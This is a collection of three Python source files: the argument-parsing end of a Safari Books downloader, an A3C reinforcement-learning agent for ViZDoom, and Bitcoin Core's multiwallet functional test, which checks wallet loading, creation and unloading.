"--no-cookies", dest="no_cookies", action='store_true',
help="Prevent your session data to be saved into `cookies.json` file."
)
arguments.add_argument(
"--kindle", dest="kindle", action='store_true',
help="Add some CSS rules that block overflow on `table` and `pre` elements."
" Use this option if you're going to export the EPUB to E-Readers like Amazon Kindle."
)
arguments.add_argument(
"--preserve-log", dest="log", action='store_true', help="Leave the `info_XXXXXXXXXXXXX.log`"
" file even if there isn't any error."
)
arguments.add_argument("--help", action="help", default=argparse.SUPPRESS, help='Show this help message.')
arguments.add_argument(
"bookid", metavar='<BOOK ID>',
help="Book digits ID that you want to download. You can find it in the URL (X-es):"
" `" + SAFARI_BASE_URL + "/library/view/book-name/XXXXXXXXXXXXX/`"
)
args_parsed = arguments.parse_args()
if args_parsed.cred or args_parsed.login:
user_email = ""
pre_cred = ""
if args_parsed.cred:
pre_cred = args_parsed.cred
else:
user_email = input("Email: ")
passwd = getpass.getpass("Password: ")
pre_cred = user_email + ":" + passwd
parsed_cred = SafariBooks.parse_cred(pre_cred)
if not parsed_cred:
arguments.error("invalid credential: %s" % (
args_parsed.cred if args_parsed.cred else (user_email + ":*******")
))
args_parsed.cred = parsed_cred
else:
if args_parsed.no_cookies:
arguments.error("invalid option: `--no-cookies` is valid only if you use the `--cred` option")
SafariBooks(args_parsed)
    # Hint: if you want to download more than one book at once, initialize more than one instance of `SafariBooks`...
sys.exit(0)
|
agent_a3c.py
|
#!/usr/bin/env python
from __future__ import print_function
import numpy as np
import cv2
import tensorflow as tf
import threading
import sys
import time
import os
def MakeDir(path):
try:
os.makedirs(path)
except:
pass
lab = False
load_model = False
train = True
test_display = True
test_write_video = True
path_work_dir = "~/rl_3d/"
vizdoom_path = "~/ViZDoom/"
vizdoom_scenario = vizdoom_path + "scenarios/simpler_basic.wad"
if (lab):
from env_lab import EnvLab
model_path = path_work_dir + "model_lab_a3c/"
else:
from env_vizdoom import EnvVizDoom
model_path = path_work_dir + "model_vizdoom_a3c/"
learning_rate = 0.00025
device = "/cpu:0"
num_workers = 3
t_max = 30
frame_repeat = 10 # 4
gamma = 0.99
step_num = int(2.5e5)
save_each = 0.01 * step_num
step_load = 100
entropy_beta = 0.01
grad_norm_clip = 40.0
global_scope_name = "global"
step = 0
train_scores = []
lock = threading.Lock()
start_time = 0
# Global.
env = None
MakeDir(model_path)
model_name = model_path + "a3c"
def PrintStat(elapsed_time, step, step_num, train_scores):
steps_per_s = 1.0 * step / elapsed_time
steps_per_m = 60.0 * step / elapsed_time
steps_per_h = 3600.0 * step / elapsed_time
steps_remain = step_num - step
remain_h = int(steps_remain / steps_per_h)
remain_m = int((steps_remain - remain_h * steps_per_h) / steps_per_m)
remain_s = int((steps_remain - remain_h * steps_per_h - remain_m * steps_per_m) / steps_per_s)
elapsed_h = int(elapsed_time / 3600)
elapsed_m = int((elapsed_time - elapsed_h * 3600) / 60)
elapsed_s = int((elapsed_time - elapsed_h * 3600 - elapsed_m * 60))
print("{}% | Steps: {}/{}, {:.2f}M step/h, {:02}:{:02}:{:02}/{:02}:{:02}:{:02}".format(
100.0 * step / step_num, step, step_num, steps_per_h / 1e6,
elapsed_h, elapsed_m, elapsed_s, remain_h, remain_m, remain_s), file=sys.stderr)
mean_train = 0
std_train = 0
min_train = 0
max_train = 0
if (len(train_scores) > 0):
train_scores = np.array(train_scores)
mean_train = train_scores.mean()
std_train = train_scores.std()
min_train = train_scores.min()
max_train = train_scores.max()
print("Episodes: {} Rewards: mean: {:.2f}, std: {:.2f}, min: {:.2f}, max: {:.2f}".format(
len(train_scores), mean_train, std_train, min_train, max_train), file=sys.stderr)
channels = 3
resolution = (40, 40, channels)
def Preprocess(frame):
if (channels == 1):
frame = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
frame = cv2.resize(frame, (resolution[1], resolution[0]))
return np.reshape(frame, resolution)
class ACNet(object):
def __init__(self, num_actions, scope, trainer):
with tf.variable_scope(scope):
self.inputs = tf.placeholder(shape=[None] + list(resolution), dtype=tf.float32)
conv1 = tf.contrib.layers.conv2d(self.inputs, num_outputs=16, kernel_size=[3, 3], stride=[2, 2])
conv2 = tf.contrib.layers.conv2d(conv1, num_outputs=32, kernel_size=[3, 3], stride=[2, 2])
conv2_flat = tf.contrib.layers.flatten(conv2)
hidden = tf.contrib.layers.fully_connected(conv2_flat, 256)
# Recurrent network for temporal dependencies
# Introduce a "fake" batch dimension of 1 after flatten so that we can do LSTM over time dim
rnn_in = tf.expand_dims(hidden, [0])
lstm_size = 256
lstm_cell = tf.contrib.rnn.BasicLSTMCell(lstm_size, state_is_tuple=True)
step_size = tf.shape(self.inputs)[:1]
c_init = np.zeros((1, lstm_cell.state_size.c), dtype=np.float32)
h_init = np.zeros((1, lstm_cell.state_size.h), dtype=np.float32)
self.state_init = [c_init, h_init]
self.rnn_state = self.state_init
c_in = tf.placeholder(shape=[1, lstm_cell.state_size.c], dtype=tf.float32)
h_in = tf.placeholder(shape=[1, lstm_cell.state_size.h], dtype=tf.float32)
self.state_in = (c_in, h_in)
state_in = tf.contrib.rnn.LSTMStateTuple(c_in, h_in)
lstm_outputs, lstm_state = tf.nn.dynamic_rnn(lstm_cell, rnn_in, initial_state=state_in,
sequence_length=step_size, time_major=False)
lstm_c, lstm_h = lstm_state
rnn_out = tf.reshape(lstm_outputs, [-1, lstm_size])
self.state_out = (lstm_c[:1, :], lstm_h[:1, :])
# Output layers for policy and value estimations
self.policy = tf.contrib.layers.fully_connected(rnn_out, num_actions, activation_fn=tf.nn.softmax,
weights_initializer=self.normalized_columns_initializer(0.01),
biases_initializer=None)
self.value = tf.contrib.layers.fully_connected(rnn_out, 1, activation_fn=None,
weights_initializer=self.normalized_columns_initializer(1.0),
biases_initializer=None)
            # Only the worker networks need ops for loss functions and gradient updates.
if (scope != global_scope_name):
self.actions = tf.placeholder(shape=[None], dtype=tf.int32)
actions_onehot = tf.one_hot(self.actions, num_actions, dtype=tf.float32)
self.target_v = tf.placeholder(shape=[None], dtype=tf.float32)
self.advantages = tf.placeholder(shape=[None], dtype=tf.float32)
responsible_outputs = tf.reduce_sum(self.policy * actions_onehot, [1])
# Loss functions
value_loss = 0.5 * tf.reduce_sum(tf.square(self.target_v - tf.reshape(self.value, [-1])))
entropy = -tf.reduce_sum(self.policy * tf.log(self.policy))
policy_loss = -tf.reduce_sum(tf.log(responsible_outputs) * self.advantages)
self.loss = 0.5 * value_loss + policy_loss - entropy * entropy_beta
# Get gradients from local network using local losses
local_vars = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope)
self.gradients = tf.gradients(self.loss, local_vars)
if (grad_norm_clip != None):
grads, _ = tf.clip_by_global_norm(self.gradients, grad_norm_clip)
else:
grads = self.gradients
# Apply local gradients to global network
global_vars = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, global_scope_name)
self.apply_grads = trainer.apply_gradients(zip(grads, global_vars))
# Used to initialize weights for policy and value output layers
def normalized_columns_initializer(self, std = 1.0):
def _initializer(shape, dtype=None, partition_info=None):
out = np.random.randn(*shape).astype(np.float32)
out *= std / np.sqrt(np.square(out).sum(axis=0, keepdims=True))
return tf.constant(out)
return _initializer
def Train(self, sess, discounted_rewards, states, actions, advantages):
states = states / 255.0
self.ResetLstm()
feed_dict = {self.target_v : discounted_rewards,
self.inputs : np.stack(states, axis=0),
self.actions : actions,
self.advantages : advantages,
self.state_in[0] : self.rnn_state[0],
self.state_in[1] : self.rnn_state[1]}
_ = sess.run([self.apply_grads], feed_dict=feed_dict)
def ResetLstm(self):
self.rnn_state = self.state_init
def GetAction(self, sess, state):
state = state / 255.0
a_dist, v, self.rnn_state = sess.run([self.policy, self.value, self.state_out],
feed_dict={self.inputs: [state],
self.state_in[0]: self.rnn_state[0],
self.state_in[1]: self.rnn_state[1]})
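        # Sample an action from the policy: draw a probability value and map it back to its index
        # (this assumes the sampled value is unique within a_dist[0]).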
a = np.random.choice(a_dist[0], p=a_dist[0])
a = np.argmax(a_dist == a)
return a, v[0, 0]
def GetValue(self, sess, state):
state = state / 255.0
v = sess.run([self.value],
feed_dict={self.inputs: [state],
self.state_in[0]: self.rnn_state[0],
self.state_in[1]: self.rnn_state[1]})
return v[0][0, 0]
class Worker(object):
def __init__(self, number, num_actions, trainer, model_name):
self.name = "worker_" + str(number)
self.number = number
self.model_name = model_name
        # Create the local copy of the network and the TensorFlow ops to copy global parameters to the local network.
self.local_ac = ACNet(num_actions, self.name, trainer)
self.update_target_graph = self.update_target(global_scope_name, self.name)
if (lab):
self.env = EnvLab(80, 80, 60, "seekavoid_arena_01")
else:
self.env = EnvVizDoom(vizdoom_scenario)
# Copies one set of variables to another.
# Used to set worker network parameters to those of global network.
def update_target(self, from_scope, to_scope):
from_vars = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, from_scope)
to_vars = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, to_scope)
op_holder = []
for from_var, to_var in zip(from_vars, to_vars):
op_holder.append(to_var.assign(from_var))
return op_holder
# Calculate discounted returns.
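    # (in place, back to front); e.g. with gamma = 0.99, [1, 0, 1] -> [1.9801, 0.99, 1.0].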
def Discount(self, x, gamma):
for idx in reversed(xrange(len(x) - 1)):
x[idx] += x[idx + 1] * gamma
return x
def Start(self, session, saver, coord):
worker_process = lambda: self.Process(session, saver, coord)
thread = threading.Thread(target=worker_process)
thread.start()
global start_time
start_time = time.time()
return thread
def Train(self, episode_buffer, sess, bootstrap_value):
episode_buffer = np.array(episode_buffer)
states = episode_buffer[:, 0]
actions = episode_buffer[:, 1]
rewards = episode_buffer[:, 2]
values = episode_buffer[:, 3]
# Here we take the rewards and values from the episode_buffer, and use them to
# generate the advantage and discounted returns.
# The advantage function uses "Generalized Advantage Estimation"
rewards_plus = np.asarray(rewards.tolist() + [bootstrap_value])
discounted_rewards = self.Discount(rewards_plus, gamma)[:-1]
value_plus = np.asarray(values.tolist() + [bootstrap_value])
advantages = rewards + gamma * value_plus[1:] - value_plus[:-1]
advantages = self.Discount(advantages, gamma)
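        # `advantages` above are the one-step TD errors r_t + gamma * V(s_{t+1}) - V(s_t);
        # discounting them with gamma corresponds to GAE with lambda = 1.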
# Update the global network using gradients from loss
# Generate network statistics to periodically save
self.local_ac.Train(sess, discounted_rewards, states, actions, advantages)
def Process(self, sess, saver, coord):
global step, train_scores, start_time, lock
print("Starting worker " + str(self.number))
while (not coord.should_stop()):
sess.run(self.update_target_graph)
episode_buffer = []
episode_reward = 0
self.env.Reset()
s = self.env.Observation()
s = Preprocess(s)
self.local_ac.ResetLstm()
while (self.env.IsRunning()):
# Take an action using probabilities from policy network output.
a, v = self.local_ac.GetAction(sess, s)
r = self.env.Act(a, frame_repeat)
finished = not self.env.IsRunning()
if (not finished):
s1 = self.env.Observation()
s1 = Preprocess(s1)
else:
s1 = None
episode_buffer.append([s, a, r, v])
episode_reward += r
s = s1
lock.acquire()
step += 1
if (step % save_each == 0):
model_name_curr = self.model_name + "_{:04}".format(int(step / save_each))
print("\nSaving the network weigths to:", model_name_curr, file=sys.stderr)
saver.save(sess, model_name_curr)
PrintStat(time.time() - start_time, step, step_num, train_scores)
train_scores = []
if (step == step_num):
coord.request_stop()
lock.release()
# If the episode hasn't ended, but the experience buffer is full, then we
# make an update step using that experience rollout.
if (len(episode_buffer) == t_max or (finished and len(episode_buffer) > 0)):
# Since we don't know what the true final return is,
# we "bootstrap" from our current value estimation.
if (not finished):
v1 = self.local_ac.GetValue(sess, s)
self.Train(episode_buffer, sess, v1)
episode_buffer = []
sess.run(self.update_target_graph)
else:
self.Train(episode_buffer, sess, 0.0)
lock.acquire()
train_scores.append(episode_reward)
lock.release()
class Agent(object):
def __init__(self):
config = tf.ConfigProto()
config.gpu_options.allow_growth = True
config.log_device_placement = False
config.allow_soft_placement = True
self.session = tf.Session(config=config)
with tf.device(device):
# Global network
self.global_net = ACNet(env.NumActions(), global_scope_name, None)
if (train):
trainer = tf.train.RMSPropOptimizer(learning_rate)
workers = []
for i in xrange(num_workers):
workers.append(Worker(i, env.NumActions(), trainer, model_name))
saver = tf.train.Saver(max_to_keep=100)
if (load_model):
model_name_curr = model_name + "_{:04}".format(step_load)
print("Loading model from: ", model_name_curr)
saver.restore(self.session, model_name_curr)
else:
self.session.run(tf.global_variables_initializer())
if (train):
coord = tf.train.Coordinator()
# Start the "work" process for each worker in a separate thread.
worker_threads = []
for worker in workers:
thread = worker.Start(self.session, saver, coord)
worker_threads.append(thread)
coord.join(worker_threads)
def Reset(self):
self.global_net.ResetLstm()
def Act(self, state):
action, _ = self.global_net.GetAction(self.session, state)
return action
def Test(agent):
if (test_write_video):
size = (640, 480)
fps = 30.0
fourcc = cv2.VideoWriter_fourcc(*'XVID') # cv2.cv.CV_FOURCC(*'XVID')
out_video = cv2.VideoWriter(path_work_dir + "test.avi", fourcc, fps, size)
reward_total = 0
num_episodes = 30
while (num_episodes != 0):
if (not env.IsRunning()):
env.Reset()
agent.Reset()
print("Total reward: {}".format(reward_total))
reward_total = 0
num_episodes -= 1
state_raw = env.Observation()
state = Preprocess(state_raw)
action = agent.Act(state)
for _ in xrange(frame_repeat):
if (test_display):
cv2.imshow("frame-test", state_raw)
cv2.waitKey(20)
if (test_write_video):
out_video.write(state_raw)
reward = env.Act(action, 1)
reward_total += reward
if (not env.IsRunning()):
break
state_raw = env.Observation()
if __name__ == '__main__':
if (lab):
env = EnvLab(80, 80, 60, "seekavoid_arena_01")
else:
env = EnvVizDoom(vizdoom_scenario)
agent = Agent()
Test(agent)
|
wallet_multiwallet.py
|
#!/usr/bin/env python3
# Copyright (c) 2017-2020 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test multiwallet.
Verify that a bitcoind node can load multiple wallet files
"""
from decimal import Decimal
from threading import Thread
import os
import shutil
import stat
import time
from test_framework.authproxy import JSONRPCException
from test_framework.blocktools import COINBASE_MATURITY
from test_framework.test_framework import BitcoinTestFramework
from test_framework.test_node import ErrorMatch
from test_framework.util import (
assert_equal,
assert_raises_rpc_error,
get_rpc_proxy,
)
got_loading_error = False
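# Helper run from several threads: repeatedly load/unload the same wallet until one call races
# another and fails with "Wallet already loading", which the concurrency test asserts below.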
def test_load_unload(node, name):
global got_loading_error
while True:
if got_loading_error:
return
try:
node.loadwallet(name)
node.unloadwallet(name)
except JSONRPCException as e:
if e.error['code'] == -4 and 'Wallet already loading' in e.error['message']:
got_loading_error = True
return
class MultiWalletTest(BitcoinTestFramework):
def set_test_params(self):
self.setup_clean_chain = True
self.num_nodes = 2
self.rpc_timeout = 120
self.extra_args = [["-nowallet"], []]
def skip_test_if_missing_module(self):
self.skip_if_no_wallet()
def add_options(self, parser):
parser.add_argument(
'--data_wallets_dir',
default=os.path.join(os.path.dirname(os.path.realpath(__file__)), 'data/wallets/'),
help='Test data with wallet directories (default: %(default)s)',
)
def run_test(self):
node = self.nodes[0]
data_dir = lambda *p: os.path.join(node.datadir, self.chain, *p)
wallet_dir = lambda *p: data_dir('wallets', *p)
wallet = lambda name: node.get_wallet_rpc(name)
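        # Resolve a wallet name to its on-disk data file: the default wallet and directory wallets
        # map to a data file inside their directory, plain-file wallets map to the path itself.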
def wallet_file(name):
if name == self.default_wallet_name:
return wallet_dir(self.default_wallet_name, self.wallet_data_filename)
if os.path.isdir(wallet_dir(name)):
return wallet_dir(name, "wallet.dat")
return wallet_dir(name)
assert_equal(self.nodes[0].listwalletdir(), {'wallets': [{'name': self.default_wallet_name}]})
# check wallet.dat is created
self.stop_nodes()
assert_equal(os.path.isfile(wallet_dir(self.default_wallet_name, self.wallet_data_filename)), True)
# create symlink to verify wallet directory path can be referenced
# through symlink
os.mkdir(wallet_dir('w7'))
os.symlink('w7', wallet_dir('w7_symlink'))
os.symlink('..', wallet_dir('recursive_dir_symlink'))
os.mkdir(wallet_dir('self_walletdat_symlink'))
os.symlink('wallet.dat', wallet_dir('self_walletdat_symlink/wallet.dat'))
# rename wallet.dat to make sure plain wallet file paths (as opposed to
# directory paths) can be loaded
# create another dummy wallet for use in testing backups later
self.start_node(0)
node.createwallet("empty")
node.createwallet("plain")
node.createwallet("created")
self.stop_nodes()
empty_wallet = os.path.join(self.options.tmpdir, 'empty.dat')
os.rename(wallet_file("empty"), empty_wallet)
shutil.rmtree(wallet_dir("empty"))
empty_created_wallet = os.path.join(self.options.tmpdir, 'empty.created.dat')
os.rename(wallet_dir("created", self.wallet_data_filename), empty_created_wallet)
shutil.rmtree(wallet_dir("created"))
os.rename(wallet_file("plain"), wallet_dir("w8"))
shutil.rmtree(wallet_dir("plain"))
# restart node with a mix of wallet names:
# w1, w2, w3 - to verify new wallets created when non-existing paths specified
# w - to verify wallet name matching works when one wallet path is prefix of another
# sub/w5 - to verify relative wallet path is created correctly
# extern/w6 - to verify absolute wallet path is created correctly
# w7_symlink - to verify symlinked wallet path is initialized correctly
# w8 - to verify existing wallet file is loaded correctly. Not tested for SQLite wallets as this is a deprecated BDB behavior.
# '' - to verify default wallet file is created correctly
to_create = ['w1', 'w2', 'w3', 'w', 'sub/w5', 'w7_symlink']
in_wallet_dir = [w.replace('/', os.path.sep) for w in to_create] # Wallets in the wallet dir
in_wallet_dir.append('w7') # w7 is not loaded or created, but will be listed by listwalletdir because w7_symlink
to_create.append(os.path.join(self.options.tmpdir, 'extern/w6')) # External, not in the wallet dir, so we need to avoid adding it to in_wallet_dir
to_load = [self.default_wallet_name]
if not self.options.descriptors:
to_load.append('w8')
wallet_names = to_create + to_load # Wallet names loaded in the wallet
in_wallet_dir += to_load # The loaded wallets are also in the wallet dir
self.start_node(0)
for wallet_name in to_create:
self.nodes[0].createwallet(wallet_name)
for wallet_name in to_load:
self.nodes[0].loadwallet(wallet_name)
os.mkdir(wallet_dir('no_access'))
os.chmod(wallet_dir('no_access'), 0)
try:
with self.nodes[0].assert_debug_log(expected_msgs=['Error scanning']):
walletlist = self.nodes[0].listwalletdir()['wallets']
finally:
# Need to ensure access is restored for cleanup
os.chmod(wallet_dir('no_access'), stat.S_IRUSR | stat.S_IWUSR | stat.S_IXUSR)
assert_equal(sorted(map(lambda w: w['name'], walletlist)), sorted(in_wallet_dir))
assert_equal(set(node.listwallets()), set(wallet_names))
# should raise rpc error if wallet path can't be created
err_code = -4 if self.options.descriptors else -1
assert_raises_rpc_error(err_code, "boost::filesystem::create_directory:", self.nodes[0].createwallet, "w8/bad")
# check that all requested wallets were created
self.stop_node(0)
for wallet_name in wallet_names:
assert_equal(os.path.isfile(wallet_file(wallet_name)), True)
self.nodes[0].assert_start_raises_init_error(['-walletdir=wallets'], 'Error: Specified -walletdir "wallets" does not exist')
self.nodes[0].assert_start_raises_init_error(['-walletdir=wallets'], 'Error: Specified -walletdir "wallets" is a relative path', cwd=data_dir())
self.nodes[0].assert_start_raises_init_error(['-walletdir=debug.log'], 'Error: Specified -walletdir "debug.log" is not a directory', cwd=data_dir())
self.start_node(0, ['-wallet=w1', '-wallet=w1'])
self.stop_node(0, 'Warning: Ignoring duplicate -wallet w1.')
if not self.options.descriptors:
# Only BDB doesn't open duplicate wallet files. SQLite does not have this limitation. While this may be desired in the future, it is not necessary
# should not initialize if one wallet is a copy of another
shutil.copyfile(wallet_dir('w8'), wallet_dir('w8_copy'))
in_wallet_dir.append('w8_copy')
exp_stderr = r"BerkeleyDatabase: Can't open database w8_copy \(duplicates fileid \w+ from w8\)"
self.nodes[0].assert_start_raises_init_error(['-wallet=w8', '-wallet=w8_copy'], exp_stderr, match=ErrorMatch.PARTIAL_REGEX)
# should not initialize if wallet file is a symlink
os.symlink('w8', wallet_dir('w8_symlink'))
self.nodes[0].assert_start_raises_init_error(['-wallet=w8_symlink'], r'Error: Invalid -wallet path \'w8_symlink\'\. .*', match=ErrorMatch.FULL_REGEX)
# should not initialize if the specified walletdir does not exist
self.nodes[0].assert_start_raises_init_error(['-walletdir=bad'], 'Error: Specified -walletdir "bad" does not exist')
# should not initialize if the specified walletdir is not a directory
not_a_dir = wallet_dir('notadir')
open(not_a_dir, 'a', encoding="utf8").close()
self.nodes[0].assert_start_raises_init_error(['-walletdir=' + not_a_dir], 'Error: Specified -walletdir "' + not_a_dir + '" is not a directory')
self.log.info("Do not allow -upgradewallet with multiwallet")
self.nodes[0].assert_start_raises_init_error(['-upgradewallet'], "Error: Error parsing command line arguments: Invalid parameter -upgradewallet")
# if wallets/ doesn't exist, datadir should be the default wallet dir
wallet_dir2 = data_dir('walletdir')
os.rename(wallet_dir(), wallet_dir2)
self.start_node(0)
self.nodes[0].createwallet("w4")
self.nodes[0].createwallet("w5")
assert_equal(set(node.listwallets()), {"w4", "w5"})
w5 = wallet("w5")
node.generatetoaddress(nblocks=1, address=w5.getnewaddress())
# now if wallets/ exists again, but the rootdir is specified as the walletdir, w4 and w5 should still be loaded
os.rename(wallet_dir2, wallet_dir())
self.restart_node(0, ['-nowallet', '-walletdir=' + data_dir()])
self.nodes[0].loadwallet("w4")
self.nodes[0].loadwallet("w5")
assert_equal(set(node.listwallets()), {"w4", "w5"})
w5 = wallet("w5")
w5_info = w5.getwalletinfo()
assert_equal(w5_info['immature_balance'], 50)
competing_wallet_dir = os.path.join(self.options.tmpdir, 'competing_walletdir')
os.mkdir(competing_wallet_dir)
self.restart_node(0, ['-nowallet', '-walletdir=' + competing_wallet_dir])
self.nodes[0].createwallet(self.default_wallet_name)
if self.options.descriptors:
exp_stderr = r"Error: SQLiteDatabase: Unable to obtain an exclusive lock on the database, is it being used by another bitcoind?"
else:
exp_stderr = r"Error: Error initializing wallet database environment \"\S+competing_walletdir\S*\"!"
self.nodes[1].assert_start_raises_init_error(['-walletdir=' + competing_wallet_dir], exp_stderr, match=ErrorMatch.PARTIAL_REGEX)
self.restart_node(0)
for wallet_name in wallet_names:
self.nodes[0].loadwallet(wallet_name)
assert_equal(sorted(map(lambda w: w['name'], self.nodes[0].listwalletdir()['wallets'])), sorted(in_wallet_dir))
wallets = [wallet(w) for w in wallet_names]
wallet_bad = wallet("bad")
# check wallet names and balances
node.generatetoaddress(nblocks=1, address=wallets[0].getnewaddress())
for wallet_name, wallet in zip(wallet_names, wallets):
info = wallet.getwalletinfo()
assert_equal(info['immature_balance'], 50 if wallet is wallets[0] else 0)
assert_equal(info['walletname'], wallet_name)
# accessing invalid wallet fails
assert_raises_rpc_error(-18, "Requested wallet does not exist or is not loaded", wallet_bad.getwalletinfo)
# accessing wallet RPC without using wallet endpoint fails
assert_raises_rpc_error(-19, "Wallet file not specified", node.getwalletinfo)
w1, w2, w3, w4, *_ = wallets
node.generatetoaddress(nblocks=COINBASE_MATURITY + 1, address=w1.getnewaddress())
assert_equal(w1.getbalance(), 100)
assert_equal(w2.getbalance(), 0)
assert_equal(w3.getbalance(), 0)
assert_equal(w4.getbalance(), 0)
w1.sendtoaddress(w2.getnewaddress(), 1)
w1.sendtoaddress(w3.getnewaddress(), 2)
w1.sendtoaddress(w4.getnewaddress(), 3)
node.generatetoaddress(nblocks=1, address=w1.getnewaddress())
assert_equal(w2.getbalance(), 1)
assert_equal(w3.getbalance(), 2)
assert_equal(w4.getbalance(), 3)
batch = w1.batch([w1.getblockchaininfo.get_request(), w1.getwalletinfo.get_request()])
assert_equal(batch[0]["result"]["chain"], self.chain)
assert_equal(batch[1]["result"]["walletname"], "w1")
self.log.info('Test per-wallet setfeerate and settxfee calls')
assert_equal(w1.getwalletinfo()['paytxfee'], 0)
assert_equal(w2.getwalletinfo()['paytxfee'], 0)
w2.setfeerate(200)
assert_equal(w1.getwalletinfo()['paytxfee'], 0)
assert_equal(w2.getwalletinfo()['paytxfee'], Decimal('0.00200000'))
w2.settxfee(0.001)
assert_equal(w1.getwalletinfo()['paytxfee'], 0)
assert_equal(w2.getwalletinfo()['paytxfee'], Decimal('0.00100000'))
w1.setfeerate(30)
assert_equal(w1.getwalletinfo()['paytxfee'], Decimal('0.00030000'))
assert_equal(w2.getwalletinfo()['paytxfee'], Decimal('0.00100000'))
self.log.info("Test dynamic wallet loading")
self.restart_node(0, ['-nowallet'])
assert_equal(node.listwallets(), [])
assert_raises_rpc_error(-18, "No wallet is loaded. Load a wallet using loadwallet or create a new one with createwallet. (Note: A default wallet is no longer automatically created)", node.getwalletinfo)
self.log.info("Load first wallet")
loadwallet_name = node.loadwallet(wallet_names[0])
assert_equal(loadwallet_name['name'], wallet_names[0])
assert_equal(node.listwallets(), wallet_names[0:1])
node.getwalletinfo()
w1 = node.get_wallet_rpc(wallet_names[0])
w1.getwalletinfo()
self.log.info("Load second wallet")
loadwallet_name = node.loadwallet(wallet_names[1])
assert_equal(loadwallet_name['name'], wallet_names[1])
assert_equal(node.listwallets(), wallet_names[0:2])
assert_raises_rpc_error(-19, "Wallet file not specified", node.getwalletinfo)
w2 = node.get_wallet_rpc(wallet_names[1])
w2.getwalletinfo()
self.log.info("Concurrent wallet loading")
threads = []
for _ in range(3):
n = node.cli if self.options.usecli else get_rpc_proxy(node.url, 1, timeout=600, coveragedir=node.coverage_dir)
t = Thread(target=test_load_unload, args=(n, wallet_names[2]))
t.start()
threads.append(t)
for t in threads:
t.join()
global got_loading_error
assert_equal(got_loading_error, True)
self.log.info("Load remaining wallets")
for wallet_name in wallet_names[2:]:
loadwallet_name = self.nodes[0].loadwallet(wallet_name)
assert_equal(loadwallet_name['name'], wallet_name)
assert_equal(set(self.nodes[0].listwallets()), set(wallet_names))
# Fail to load if wallet doesn't exist
path = os.path.join(self.options.tmpdir, "node0", "regtest", "wallets", "wallets")
assert_raises_rpc_error(-18, "Wallet file verification failed. Failed to load database path '{}'. Path does not exist.".format(path), self.nodes[0].loadwallet, 'wallets')
# Fail to load duplicate wallets
path = os.path.join(self.options.tmpdir, "node0", "regtest", "wallets", "w1", "wallet.dat")
if self.options.descriptors:
assert_raises_rpc_error(-4, "Wallet file verification failed. SQLiteDatabase: Unable to obtain an exclusive lock on the database, is it being used by another bitcoind?", self.nodes[0].loadwallet, wallet_names[0])
else:
assert_raises_rpc_error(-35, "Wallet file verification failed. Refusing to load database. Data file '{}' is already loaded.".format(path), self.nodes[0].loadwallet, wallet_names[0])
# This tests the default wallet that BDB makes, so SQLite wallet doesn't need to test this
# Fail to load duplicate wallets by different ways (directory and filepath)
path = os.path.join(self.options.tmpdir, "node0", "regtest", "wallets", "wallet.dat")
assert_raises_rpc_error(-35, "Wallet file verification failed. Refusing to load database. Data file '{}' is already loaded.".format(path), self.nodes[0].loadwallet, 'wallet.dat')
# Only BDB doesn't open duplicate wallet files. SQLite does not have this limitation. While this may be desired in the future, it is not necessary
# Fail to load if one wallet is a copy of another
assert_raises_rpc_error(-4, "BerkeleyDatabase: Can't open database w8_copy (duplicates fileid", self.nodes[0].loadwallet, 'w8_copy')
# Fail to load if one wallet is a copy of another, test this twice to make sure that we don't re-introduce #14304
assert_raises_rpc_error(-4, "BerkeleyDatabase: Can't open database w8_copy (duplicates fileid", self.nodes[0].loadwallet, 'w8_copy')
# Fail to load if wallet file is a symlink
assert_raises_rpc_error(-4, "Wallet file verification failed. Invalid -wallet path 'w8_symlink'", self.nodes[0].loadwallet, 'w8_symlink')
# Fail to load if a directory is specified that doesn't contain a wallet
os.mkdir(wallet_dir('empty_wallet_dir'))
path = os.path.join(self.options.tmpdir, "node0", "regtest", "wallets", "empty_wallet_dir")
assert_raises_rpc_error(-18, "Wallet file verification failed. Failed to load database path '{}'. Data is not in recognized format.".format(path), self.nodes[0].loadwallet, 'empty_wallet_dir')
self.log.info("Test dynamic wallet creation.")
# Fail to create a wallet if it already exists.
path = os.path.join(self.options.tmpdir, "node0", "regtest", "wallets", "w2")
assert_raises_rpc_error(-4, "Failed to create database path '{}'. Database already exists.".format(path), self.nodes[0].createwallet, 'w2')
# Successfully create a wallet with a new name
loadwallet_name = self.nodes[0].createwallet('w9')
in_wallet_dir.append('w9')
assert_equal(loadwallet_name['name'], 'w9')
w9 = node.get_wallet_rpc('w9')
assert_equal(w9.getwalletinfo()['walletname'], 'w9')
assert 'w9' in self.nodes[0].listwallets()
# Successfully create a wallet using a full path
new_wallet_dir = os.path.join(self.options.tmpdir, 'new_walletdir')
new_wallet_name = os.path.join(new_wallet_dir, 'w10')
loadwallet_name = self.nodes[0].createwallet(new_wallet_name)
assert_equal(loadwallet_name['name'], new_wallet_name)
w10 = node.get_wallet_rpc(new_wallet_name)
assert_equal(w10.getwalletinfo()['walletname'], new_wallet_name)
assert new_wallet_name in self.nodes[0].listwallets()
self.log.info("Test dynamic wallet unloading")
# Test `unloadwallet` errors
assert_raises_rpc_error(-1, "JSON value is not a string as expected", self.nodes[0].unloadwallet)
assert_raises_rpc_error(-18, "Requested wallet does not exist or is not loaded", self.nodes[0].unloadwallet, "dummy")
assert_raises_rpc_error(-18, "Requested wallet does not exist or is not loaded", node.get_wallet_rpc("dummy").unloadwallet)
assert_raises_rpc_error(-8, "RPC endpoint wallet and wallet_name parameter specify different wallets", w1.unloadwallet, "w2"),
# Successfully unload the specified wallet name
self.nodes[0].unloadwallet("w1")
assert 'w1' not in self.nodes[0].listwallets()
# Unload w1 again, this time providing the wallet name twice
self.nodes[0].loadwallet("w1")
assert 'w1' in self.nodes[0].listwallets()
w1.unloadwallet("w1")
assert 'w1' not in self.nodes[0].listwallets()
# Successfully unload the wallet referenced by the request endpoint
# Also ensure unload works during walletpassphrase timeout
w2.encryptwallet('test')
w2.walletpassphrase('test', 1)
w2.unloadwallet()
time.sleep(1.1)
assert 'w2' not in self.nodes[0].listwallets()
# Successfully unload all wallets
for wallet_name in self.nodes[0].listwallets():
self.nodes[0].unloadwallet(wallet_name)
assert_equal(self.nodes[0].listwallets(), [])
